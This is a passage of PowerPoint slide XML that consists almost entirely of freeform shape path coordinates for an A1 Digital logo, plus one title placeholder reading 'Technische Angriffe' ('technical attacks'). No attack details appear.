                    <a:pt x="209085" y="545452"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="175639" y="635588"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="239765" y="635588"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="239765" y="736879"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="736879"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="635588"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="52059" y="635588"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="3936902" y="67265"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4119164" y="67265"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4119164" y="635494"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4182422" y="635494"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4182422" y="736863"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3930378" y="736863"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3930378" y="635494"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4001074" y="635494"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4001074" y="168636"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3936902" y="168636"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="1221438" y="67265"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1475304" y="67265"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1593431" y="67265"/>
                    <a:pt x="1673403" y="91441"/>
                    <a:pt x="1736636" y="147236"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1804540" y="206761"/>
                    <a:pt x="1839860" y="293249"/>
                    <a:pt x="1839860" y="402075"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1839860" y="431821"/>
                    <a:pt x="1837085" y="461600"/>
                    <a:pt x="1831511" y="489482"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1811977" y="580610"/>
                    <a:pt x="1763607" y="649456"/>
                    <a:pt x="1686412" y="692212"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1631559" y="722902"/>
                    <a:pt x="1564597" y="736863"/>
                    <a:pt x="1475304" y="736863"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1221438" y="736863"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1221438" y="635494"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1285595" y="635494"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1285595" y="168636"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1221438" y="168636"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="750838" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="832594" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="832594" y="368900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="935759" y="368900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="935759" y="456258"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="627228" y="456258"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="627228" y="368900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="730401" y="368900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="730401" y="99437"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="625402" y="140311"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="597510" y="669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latin typeface="A1 Sans" pitchFamily="2" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="830754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8D002-B7A2-43EA-1118-BDE02E4EB2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89270D-6621-980E-B3DE-048F3FB50007}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-76200" y="3420375"/>
            <a:ext cx="11520000" cy="2628000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>Technische Angriffe</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="6" name="A1DigitalIdentifier_weiss">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{371C1719-F722-CC4C-69AD-8C89908A83DC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks noChangeAspect="1"/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="10498725" y="6538582"/>
            <a:ext cx="1267004" cy="273601"/>
            <a:chOff x="6992830" y="2371951"/>
            <a:chExt cx="4613275" cy="996206"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="Freihandform: Form 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{643BE0CB-9982-2E08-9151-607D08F4D9F1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6992830" y="2371951"/>
              <a:ext cx="122659" cy="914341"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 122659"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 914341"/>
                <a:gd name="connsiteX1" fmla="*/ 122659 w 122659"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 914341"/>
                <a:gd name="connsiteX2" fmla="*/ 122659 w 122659"/>
                <a:gd name="connsiteY2" fmla="*/ 914341 h 914341"/>
                <a:gd name="connsiteX3" fmla="*/ 0 w 122659"/>
                <a:gd name="connsiteY3" fmla="*/ 914341 h 914341"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="connsiteX0" y="connsiteY0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX1" y="connsiteY1"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX2" y="connsiteY2"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX3" y="connsiteY3"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="122659" h="914341">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="122659" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="122659" y="914341"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="9143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latin typeface="A1 Sans" pitchFamily="2" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="Freihandform: Form 7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{86118D01-8E7E-C244-1321-34F5546F2BE8}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7423683" y="2426800"/>
              <a:ext cx="4182422" cy="941357"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 3600394 w 4182422"/>
                <a:gd name="connsiteY0" fmla="*/ 545242 h 941357"/>
                <a:gd name="connsiteX1" fmla="*/ 3512056 w 4182422"/>
                <a:gd name="connsiteY1" fmla="*/ 599184 h 941357"/>
                <a:gd name="connsiteX2" fmla="*/ 3516701 w 4182422"/>
                <a:gd name="connsiteY2" fmla="*/ 622437 h 941357"/>
                <a:gd name="connsiteX3" fmla="*/ 3588311 w 4182422"/>
                <a:gd name="connsiteY3" fmla="*/ 651261 h 941357"/>
                <a:gd name="connsiteX4" fmla="*/ 3687819 w 4182422"/>
                <a:gd name="connsiteY4" fmla="*/ 623348 h 941357"/>
                <a:gd name="connsiteX5" fmla="*/ 3705512 w 4182422"/>
                <a:gd name="connsiteY5" fmla="*/ 574988 h 941357"/>
                <a:gd name="connsiteX6" fmla="*/ 3705512 w 4182422"/>
                <a:gd name="connsiteY6" fmla="*/ 549872 h 941357"/>
                <a:gd name="connsiteX7" fmla="*/ 3600394 w 4182422"/>
                <a:gd name="connsiteY7" fmla="*/ 545242 h 941357"/>
                <a:gd name="connsiteX8" fmla="*/ 2419807 w 4182422"/>
                <a:gd name="connsiteY8" fmla="*/ 371294 h 941357"/>
                <a:gd name="connsiteX9" fmla="*/ 2380740 w 4182422"/>
                <a:gd name="connsiteY9" fmla="*/ 378729 h 941357"/>
                <a:gd name="connsiteX10" fmla="*/ 2311948 w 4182422"/>
                <a:gd name="connsiteY10" fmla="*/ 507071 h 941357"/>
                <a:gd name="connsiteX11" fmla="*/ 2319386 w 4182422"/>
                <a:gd name="connsiteY11" fmla="*/ 560072 h 941357"/>
                <a:gd name="connsiteX12" fmla="*/ 2421660 w 4182422"/>
                <a:gd name="connsiteY12" fmla="*/ 635403 h 941357"/>
                <a:gd name="connsiteX13" fmla="*/ 2536069 w 4182422"/>
                <a:gd name="connsiteY13" fmla="*/ 507983 h 941357"/>
                <a:gd name="connsiteX14" fmla="*/ 2419807 w 4182422"/>
                <a:gd name="connsiteY14" fmla="*/ 371294 h 941357"/>
                <a:gd name="connsiteX15" fmla="*/ 2771158 w 4182422"/>
                <a:gd name="connsiteY15" fmla="*/ 283028 h 941357"/>
                <a:gd name="connsiteX16" fmla="*/ 2953445 w 4182422"/>
                <a:gd name="connsiteY16" fmla="*/ 283028 h 941357"/>
                <a:gd name="connsiteX17" fmla="*/ 2953445 w 4182422"/>
                <a:gd name="connsiteY17" fmla="*/ 635488 h 941357"/>
                <a:gd name="connsiteX18" fmla="*/ 3016678 w 4182422"/>
                <a:gd name="connsiteY18" fmla="*/ 635488 h 941357"/>
                <a:gd name="connsiteX19" fmla="*/ 3016678 w 4182422"/>
                <a:gd name="connsiteY19" fmla="*/ 736857 h 941357"/>
                <a:gd name="connsiteX20" fmla="*/ 2764635 w 4182422"/>
                <a:gd name="connsiteY20" fmla="*/ 736857 h 941357"/>
                <a:gd name="connsiteX21" fmla="*/ 2764635 w 4182422"/>
                <a:gd name="connsiteY21" fmla="*/ 635488 h 941357"/>
                <a:gd name="connsiteX22" fmla="*/ 2835331 w 4182422"/>
                <a:gd name="connsiteY22" fmla="*/ 635488 h 941357"/>
                <a:gd name="connsiteX23" fmla="*/ 2835331 w 4182422"/>
                <a:gd name="connsiteY23" fmla="*/ 384399 h 941357"/>
                <a:gd name="connsiteX24" fmla="*/ 2771158 w 4182422"/>
                <a:gd name="connsiteY24" fmla="*/ 384399 h 941357"/>
                <a:gd name="connsiteX25" fmla="*/ 1904769 w 4182422"/>
                <a:gd name="connsiteY25" fmla="*/ 283028 h 941357"/>
                <a:gd name="connsiteX26" fmla="*/ 2087043 w 4182422"/>
                <a:gd name="connsiteY26" fmla="*/ 283028 h 941357"/>
                <a:gd name="connsiteX27" fmla="*/ 2087043 w 4182422"/>
                <a:gd name="connsiteY27" fmla="*/ 635488 h 941357"/>
                <a:gd name="connsiteX28" fmla="*/ 2150294 w 4182422"/>
                <a:gd name="connsiteY28" fmla="*/ 635488 h 941357"/>
                <a:gd name="connsiteX29" fmla="*/ 2150294 w 4182422"/>
                <a:gd name="connsiteY29" fmla="*/ 736857 h 941357"/>
                <a:gd name="connsiteX30" fmla="*/ 1898246 w 4182422"/>
                <a:gd name="connsiteY30" fmla="*/ 736857 h 941357"/>
                <a:gd name="connsiteX31" fmla="*/ 1898246 w 4182422"/>
                <a:gd name="connsiteY31" fmla="*/ 635488 h 941357"/>
                <a:gd name="connsiteX32" fmla="*/ 1968924 w 4182422"/>
                <a:gd name="connsiteY32" fmla="*/ 635488 h 941357"/>
                <a:gd name="connsiteX33" fmla="*/ 1968924 w 4182422"/>
                <a:gd name="connsiteY33" fmla="*/ 384399 h 941357"/>
                <a:gd name="connsiteX34" fmla="*/ 1904769 w 4182422"/>
                <a:gd name="connsiteY34" fmla="*/ 384399 h 941357"/>
                <a:gd name="connsiteX35" fmla="*/ 3615295 w 4182422"/>
                <a:gd name="connsiteY35" fmla="*/ 270888 h 941357"/>
                <a:gd name="connsiteX36" fmla="*/ 3685026 w 4182422"/>
                <a:gd name="connsiteY36" fmla="*/ 275531 h 941357"/>
                <a:gd name="connsiteX37" fmla="*/ 3807787 w 4182422"/>
                <a:gd name="connsiteY37" fmla="*/ 357386 h 941357"/>
                <a:gd name="connsiteX38" fmla="*/ 3822687 w 4182422"/>
                <a:gd name="connsiteY38" fmla="*/ 468045 h 941357"/>
                <a:gd name="connsiteX39" fmla="*/ 3822687 w 4182422"/>
                <a:gd name="connsiteY39" fmla="*/ 635446 h 941357"/>
                <a:gd name="connsiteX40" fmla="*/ 3885920 w 4182422"/>
                <a:gd name="connsiteY40" fmla="*/ 635446 h 941357"/>
                <a:gd name="connsiteX41" fmla="*/ 3885920 w 4182422"/>
                <a:gd name="connsiteY41" fmla="*/ 736816 h 941357"/>
                <a:gd name="connsiteX42" fmla="*/ 3716656 w 4182422"/>
                <a:gd name="connsiteY42" fmla="*/ 736816 h 941357"/>
                <a:gd name="connsiteX43" fmla="*/ 3716656 w 4182422"/>
                <a:gd name="connsiteY43" fmla="*/ 693107 h 941357"/>
                <a:gd name="connsiteX44" fmla="*/ 3563206 w 4182422"/>
                <a:gd name="connsiteY44" fmla="*/ 749825 h 941357"/>
                <a:gd name="connsiteX45" fmla="*/ 3393942 w 4182422"/>
                <a:gd name="connsiteY45" fmla="*/ 603815 h 941357"/>
                <a:gd name="connsiteX46" fmla="*/ 3452529 w 4182422"/>
                <a:gd name="connsiteY46" fmla="*/ 483862 h 941357"/>
                <a:gd name="connsiteX47" fmla="*/ 3587372 w 4182422"/>
                <a:gd name="connsiteY47" fmla="*/ 457833 h 941357"/>
                <a:gd name="connsiteX48" fmla="*/ 3649691 w 4182422"/>
                <a:gd name="connsiteY48" fmla="*/ 459686 h 941357"/>
                <a:gd name="connsiteX49" fmla="*/ 3702694 w 4182422"/>
                <a:gd name="connsiteY49" fmla="*/ 462463 h 941357"/>
                <a:gd name="connsiteX50" fmla="*/ 3702694 w 4182422"/>
                <a:gd name="connsiteY50" fmla="*/ 442018 h 941357"/>
                <a:gd name="connsiteX51" fmla="*/ 3690611 w 4182422"/>
                <a:gd name="connsiteY51" fmla="*/ 388076 h 941357"/>
                <a:gd name="connsiteX52" fmla="*/ 3612503 w 4182422"/>
                <a:gd name="connsiteY52" fmla="*/ 366677 h 941357"/>
                <a:gd name="connsiteX53" fmla="*/ 3590190 w 4182422"/>
                <a:gd name="connsiteY53" fmla="*/ 367618 h 941357"/>
                <a:gd name="connsiteX54" fmla="*/ 3539954 w 4182422"/>
                <a:gd name="connsiteY54" fmla="*/ 420619 h 941357"/>
                <a:gd name="connsiteX55" fmla="*/ 3430216 w 4182422"/>
                <a:gd name="connsiteY55" fmla="*/ 420619 h 941357"/>
                <a:gd name="connsiteX56" fmla="*/ 3615295 w 4182422"/>
                <a:gd name="connsiteY56" fmla="*/ 270888 h 941357"/>
                <a:gd name="connsiteX57" fmla="*/ 2404018 w 4182422"/>
                <a:gd name="connsiteY57" fmla="*/ 269903 h 941357"/>
                <a:gd name="connsiteX58" fmla="*/ 2547213 w 4182422"/>
                <a:gd name="connsiteY58" fmla="*/ 331283 h 941357"/>
                <a:gd name="connsiteX59" fmla="*/ 2547213 w 4182422"/>
                <a:gd name="connsiteY59" fmla="*/ 282943 h 941357"/>
                <a:gd name="connsiteX60" fmla="*/ 2718330 w 4182422"/>
                <a:gd name="connsiteY60" fmla="*/ 282943 h 941357"/>
                <a:gd name="connsiteX61" fmla="*/ 2718330 w 4182422"/>
                <a:gd name="connsiteY61" fmla="*/ 384314 h 941357"/>
                <a:gd name="connsiteX62" fmla="*/ 2654158 w 4182422"/>
                <a:gd name="connsiteY62" fmla="*/ 384314 h 941357"/>
                <a:gd name="connsiteX63" fmla="*/ 2654158 w 4182422"/>
                <a:gd name="connsiteY63" fmla="*/ 692121 h 941357"/>
                <a:gd name="connsiteX64" fmla="*/ 2616030 w 4182422"/>
                <a:gd name="connsiteY64" fmla="*/ 866968 h 941357"/>
                <a:gd name="connsiteX65" fmla="*/ 2423513 w 4182422"/>
                <a:gd name="connsiteY65" fmla="*/ 941357 h 941357"/>
                <a:gd name="connsiteX66" fmla="*/ 2226352 w 4182422"/>
                <a:gd name="connsiteY66" fmla="*/ 789773 h 941357"/>
                <a:gd name="connsiteX67" fmla="*/ 2336114 w 4182422"/>
                <a:gd name="connsiteY67" fmla="*/ 789773 h 941357"/>
                <a:gd name="connsiteX68" fmla="*/ 2423513 w 4182422"/>
                <a:gd name="connsiteY68" fmla="*/ 844657 h 941357"/>
                <a:gd name="connsiteX69" fmla="*/ 2522107 w 4182422"/>
                <a:gd name="connsiteY69" fmla="*/ 797229 h 941357"/>
                <a:gd name="connsiteX70" fmla="*/ 2536069 w 4182422"/>
                <a:gd name="connsiteY70" fmla="*/ 705141 h 941357"/>
                <a:gd name="connsiteX71" fmla="*/ 2536069 w 4182422"/>
                <a:gd name="connsiteY71" fmla="*/ 688403 h 941357"/>
                <a:gd name="connsiteX72" fmla="*/ 2401201 w 4182422"/>
                <a:gd name="connsiteY72" fmla="*/ 737714 h 941357"/>
                <a:gd name="connsiteX73" fmla="*/ 2191955 w 4182422"/>
                <a:gd name="connsiteY73" fmla="*/ 507983 h 941357"/>
                <a:gd name="connsiteX74" fmla="*/ 2204978 w 4182422"/>
                <a:gd name="connsiteY74" fmla="*/ 416857 h 941357"/>
                <a:gd name="connsiteX75" fmla="*/ 2404018 w 4182422"/>
                <a:gd name="connsiteY75" fmla="*/ 269903 h 941357"/>
                <a:gd name="connsiteX76" fmla="*/ 338260 w 4182422"/>
                <a:gd name="connsiteY76" fmla="*/ 189573 h 941357"/>
                <a:gd name="connsiteX77" fmla="*/ 245317 w 4182422"/>
                <a:gd name="connsiteY77" fmla="*/ 446957 h 941357"/>
                <a:gd name="connsiteX78" fmla="*/ 431200 w 4182422"/>
                <a:gd name="connsiteY78" fmla="*/ 446957 h 941357"/>
                <a:gd name="connsiteX79" fmla="*/ 1408353 w 4182422"/>
                <a:gd name="connsiteY79" fmla="*/ 168636 h 941357"/>
                <a:gd name="connsiteX80" fmla="*/ 1408353 w 4182422"/>
                <a:gd name="connsiteY80" fmla="*/ 635494 h 941357"/>
                <a:gd name="connsiteX81" fmla="*/ 1469732 w 4182422"/>
                <a:gd name="connsiteY81" fmla="*/ 635494 h 941357"/>
                <a:gd name="connsiteX82" fmla="*/ 1715247 w 4182422"/>
                <a:gd name="connsiteY82" fmla="*/ 402075 h 941357"/>
                <a:gd name="connsiteX83" fmla="*/ 1469732 w 4182422"/>
                <a:gd name="connsiteY83" fmla="*/ 168636 h 941357"/>
                <a:gd name="connsiteX84" fmla="*/ 3116056 w 4182422"/>
                <a:gd name="connsiteY84" fmla="*/ 135153 h 941357"/>
                <a:gd name="connsiteX85" fmla="*/ 3234145 w 4182422"/>
                <a:gd name="connsiteY85" fmla="*/ 135153 h 941357"/>
                <a:gd name="connsiteX86" fmla="*/ 3234145 w 4182422"/>
                <a:gd name="connsiteY86" fmla="*/ 283019 h 941357"/>
                <a:gd name="connsiteX87" fmla="*/ 3343908 w 4182422"/>
                <a:gd name="connsiteY87" fmla="*/ 283019 h 941357"/>
                <a:gd name="connsiteX88" fmla="*/ 3343908 w 4182422"/>
                <a:gd name="connsiteY88" fmla="*/ 384390 h 941357"/>
                <a:gd name="connsiteX89" fmla="*/ 3234145 w 4182422"/>
                <a:gd name="connsiteY89" fmla="*/ 384390 h 941357"/>
                <a:gd name="connsiteX90" fmla="*/ 3234145 w 4182422"/>
                <a:gd name="connsiteY90" fmla="*/ 558285 h 941357"/>
                <a:gd name="connsiteX91" fmla="*/ 3285320 w 4182422"/>
                <a:gd name="connsiteY91" fmla="*/ 635479 h 941357"/>
                <a:gd name="connsiteX92" fmla="*/ 3344847 w 4182422"/>
                <a:gd name="connsiteY92" fmla="*/ 635479 h 941357"/>
                <a:gd name="connsiteX93" fmla="*/ 3344847 w 4182422"/>
                <a:gd name="connsiteY93" fmla="*/ 736848 h 941357"/>
                <a:gd name="connsiteX94" fmla="*/ 3284381 w 4182422"/>
                <a:gd name="connsiteY94" fmla="*/ 736848 h 941357"/>
                <a:gd name="connsiteX95" fmla="*/ 3116056 w 4182422"/>
                <a:gd name="connsiteY95" fmla="*/ 580595 h 941357"/>
                <a:gd name="connsiteX96" fmla="*/ 3116056 w 4182422"/>
                <a:gd name="connsiteY96" fmla="*/ 384390 h 941357"/>
                <a:gd name="connsiteX97" fmla="*/ 3049091 w 4182422"/>
                <a:gd name="connsiteY97" fmla="*/ 384390 h 941357"/>
                <a:gd name="connsiteX98" fmla="*/ 3049091 w 4182422"/>
                <a:gd name="connsiteY98" fmla="*/ 283019 h 941357"/>
                <a:gd name="connsiteX99" fmla="*/ 3116056 w 4182422"/>
                <a:gd name="connsiteY99" fmla="*/ 283019 h 941357"/>
                <a:gd name="connsiteX100" fmla="*/ 2833452 w 4182422"/>
                <a:gd name="connsiteY100" fmla="*/ 95151 h 941357"/>
                <a:gd name="connsiteX101" fmla="*/ 2954359 w 4182422"/>
                <a:gd name="connsiteY101" fmla="*/ 95151 h 941357"/>
                <a:gd name="connsiteX102" fmla="*/ 2954359 w 4182422"/>
                <a:gd name="connsiteY102" fmla="*/ 220706 h 941357"/>
                <a:gd name="connsiteX103" fmla="*/ 2833452 w 4182422"/>
                <a:gd name="connsiteY103" fmla="*/ 220706 h 941357"/>
                <a:gd name="connsiteX104" fmla="*/ 1967060 w 4182422"/>
                <a:gd name="connsiteY104" fmla="*/ 95151 h 941357"/>
                <a:gd name="connsiteX105" fmla="*/ 2087965 w 4182422"/>
                <a:gd name="connsiteY105" fmla="*/ 95151 h 941357"/>
                <a:gd name="connsiteX106" fmla="*/ 2087965 w 4182422"/>
                <a:gd name="connsiteY106" fmla="*/ 220706 h 941357"/>
                <a:gd name="connsiteX107" fmla="*/ 1967060 w 4182422"/>
                <a:gd name="connsiteY107" fmla="*/ 220706 h 941357"/>
                <a:gd name="connsiteX108" fmla="*/ 275065 w 4182422"/>
                <a:gd name="connsiteY108" fmla="*/ 67826 h 941357"/>
                <a:gd name="connsiteX109" fmla="*/ 401442 w 4182422"/>
                <a:gd name="connsiteY109" fmla="*/ 67826 h 941357"/>
                <a:gd name="connsiteX110" fmla="*/ 625402 w 4182422"/>
                <a:gd name="connsiteY110" fmla="*/ 635588 h 941357"/>
                <a:gd name="connsiteX111" fmla="*/ 677400 w 4182422"/>
                <a:gd name="connsiteY111" fmla="*/ 635588 h 941357"/>
                <a:gd name="connsiteX112" fmla="*/ 677400 w 4182422"/>
                <a:gd name="connsiteY112" fmla="*/ 736879 h 941357"/>
                <a:gd name="connsiteX113" fmla="*/ 437686 w 4182422"/>
                <a:gd name="connsiteY113" fmla="*/ 736879 h 941357"/>
                <a:gd name="connsiteX114" fmla="*/ 437686 w 4182422"/>
                <a:gd name="connsiteY114" fmla="*/ 635588 h 941357"/>
                <a:gd name="connsiteX115" fmla="*/ 501792 w 4182422"/>
                <a:gd name="connsiteY115" fmla="*/ 635588 h 941357"/>
                <a:gd name="connsiteX116" fmla="*/ 468335 w 4182422"/>
                <a:gd name="connsiteY116" fmla="*/ 545452 h 941357"/>
                <a:gd name="connsiteX117" fmla="*/ 209085 w 4182422"/>
                <a:gd name="connsiteY117" fmla="*/ 545452 h 941357"/>
                <a:gd name="connsiteX118" fmla="*/ 175639 w 4182422"/>
                <a:gd name="connsiteY118" fmla="*/ 635588 h 941357"/>
                <a:gd name="connsiteX119" fmla="*/ 239765 w 4182422"/>
                <a:gd name="connsiteY119" fmla="*/ 635588 h 941357"/>
                <a:gd name="connsiteX120" fmla="*/ 239765 w 4182422"/>
                <a:gd name="connsiteY120" fmla="*/ 736879 h 941357"/>
                <a:gd name="connsiteX121" fmla="*/ 0 w 4182422"/>
                <a:gd name="connsiteY121" fmla="*/ 736879 h 941357"/>
                <a:gd name="connsiteX122" fmla="*/ 0 w 4182422"/>
                <a:gd name="connsiteY122" fmla="*/ 635588 h 941357"/>
                <a:gd name="connsiteX123" fmla="*/ 52059 w 4182422"/>
                <a:gd name="connsiteY123" fmla="*/ 635588 h 941357"/>
                <a:gd name="connsiteX124" fmla="*/ 3936902 w 4182422"/>
                <a:gd name="connsiteY124" fmla="*/ 67265 h 941357"/>
                <a:gd name="connsiteX125" fmla="*/ 4119164 w 4182422"/>
                <a:gd name="connsiteY125" fmla="*/ 67265 h 941357"/>
                <a:gd name="connsiteX126" fmla="*/ 4119164 w 4182422"/>
                <a:gd name="connsiteY126" fmla="*/ 635494 h 941357"/>
                <a:gd name="connsiteX127" fmla="*/ 4182422 w 4182422"/>
                <a:gd name="connsiteY127" fmla="*/ 635494 h 941357"/>
                <a:gd name="connsiteX128" fmla="*/ 4182422 w 4182422"/>
                <a:gd name="connsiteY128" fmla="*/ 736863 h 941357"/>
                <a:gd name="connsiteX129" fmla="*/ 3930378 w 4182422"/>
                <a:gd name="connsiteY129" fmla="*/ 736863 h 941357"/>
                <a:gd name="connsiteX130" fmla="*/ 3930378 w 4182422"/>
                <a:gd name="connsiteY130" fmla="*/ 635494 h 941357"/>
                <a:gd name="connsiteX131" fmla="*/ 4001074 w 4182422"/>
                <a:gd name="connsiteY131" fmla="*/ 635494 h 941357"/>
                <a:gd name="connsiteX132" fmla="*/ 4001074 w 4182422"/>
                <a:gd name="connsiteY132" fmla="*/ 168636 h 941357"/>
                <a:gd name="connsiteX133" fmla="*/ 3936902 w 4182422"/>
                <a:gd name="connsiteY133" fmla="*/ 168636 h 941357"/>
                <a:gd name="connsiteX134" fmla="*/ 1221438 w 4182422"/>
                <a:gd name="connsiteY134" fmla="*/ 67265 h 941357"/>
                <a:gd name="connsiteX135" fmla="*/ 1475304 w 4182422"/>
                <a:gd name="connsiteY135" fmla="*/ 67265 h 941357"/>
                <a:gd name="connsiteX136" fmla="*/ 1736636 w 4182422"/>
                <a:gd name="connsiteY136" fmla="*/ 147236 h 941357"/>
                <a:gd name="connsiteX137" fmla="*/ 1839860 w 4182422"/>
                <a:gd name="connsiteY137" fmla="*/ 402075 h 941357"/>
                <a:gd name="connsiteX138" fmla="*/ 1831511 w 4182422"/>
                <a:gd name="connsiteY138" fmla="*/ 489482 h 941357"/>
                <a:gd name="connsiteX139" fmla="*/ 1686412 w 4182422"/>
                <a:gd name="connsiteY139" fmla="*/ 692212 h 941357"/>
                <a:gd name="connsiteX140" fmla="*/ 1475304 w 4182422"/>
                <a:gd name="connsiteY140" fmla="*/ 736863 h 941357"/>
                <a:gd name="connsiteX141" fmla="*/ 1221438 w 4182422"/>
                <a:gd name="connsiteY141" fmla="*/ 736863 h 941357"/>
                <a:gd name="connsiteX142" fmla="*/ 1221438 w 4182422"/>
                <a:gd name="connsiteY142" fmla="*/ 635494 h 941357"/>
                <a:gd name="connsiteX143" fmla="*/ 1285595 w 4182422"/>
                <a:gd name="connsiteY143" fmla="*/ 635494 h 941357"/>
                <a:gd name="connsiteX144" fmla="*/ 1285595 w 4182422"/>
                <a:gd name="connsiteY144" fmla="*/ 168636 h 941357"/>
                <a:gd name="connsiteX145" fmla="*/ 1221438 w 4182422"/>
                <a:gd name="connsiteY145" fmla="*/ 168636 h 941357"/>
                <a:gd name="connsiteX146" fmla="*/ 750838 w 4182422"/>
                <a:gd name="connsiteY146" fmla="*/ 0 h 941357"/>
                <a:gd name="connsiteX147" fmla="*/ 832594 w 4182422"/>
                <a:gd name="connsiteY147" fmla="*/ 0 h 941357"/>
                <a:gd name="connsiteX148" fmla="*/ 832594 w 4182422"/>
                <a:gd name="connsiteY148" fmla="*/ 368900 h 941357"/>
                <a:gd name="connsiteX149" fmla="*/ 935759 w 4182422"/>
                <a:gd name="connsiteY149" fmla="*/ 368900 h 941357"/>
                <a:gd name="connsiteX150" fmla="*/ 935759 w 4182422"/>
                <a:gd name="connsiteY150" fmla="*/ 456258 h 941357"/>
                <a:gd name="connsiteX151" fmla="*/ 627228 w 4182422"/>
                <a:gd name="connsiteY151" fmla="*/ 456258 h 941357"/>
